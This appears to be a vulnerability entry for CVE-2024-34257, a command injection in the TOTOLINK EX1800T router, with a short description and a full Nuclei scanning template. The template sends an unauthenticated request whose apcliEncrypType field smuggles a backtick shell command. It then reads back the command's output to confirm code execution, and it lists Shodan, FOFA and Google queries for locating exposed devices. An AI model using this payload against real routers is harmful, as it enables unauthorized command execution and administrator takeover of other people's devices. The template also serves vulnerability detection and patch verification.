漏洞描述
TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
CVE-2024-34257: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection
PoC代码[已公开]
id: CVE-2024-34257
info:
name: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection
author: pussycat0x
severity: high
description: |
TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
reference:
- https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
- https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
- https://github.com/20142995/nuclei-templates
classification:
epss-score: 0.87328
epss-percentile: 0.99416
metadata:
vendor: totolink
product: a3700r_firmware
shodan-query: http.title:"totolink"
fofa-query: title="totolink"
google-query: intitle:"totolink"
tags: cve,cve2024,rce,unauth,vkev
variables:
file: "{{rand_base(6)}}"
http:
- raw:
- |
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/page/index.html
{
"token":"",
"apcliEncrypType":"`id>../{{file}}.txt`",
"topicurl":"setWiFiExtenderConfig"
}
- |
GET /{{file}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '"success": true'
- type: regex
part: body_2
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 490a00463044022026bf5a6d64bd6725bb491c6383efb50c3ae410ca1038c39a8e0bdc200741351b02206bb1cc76d55f57942f7fae28d3115b4188d5dbaff6ce7c1ea1d97b6006a3594a:922c64590222798bb761d5b6d8e72950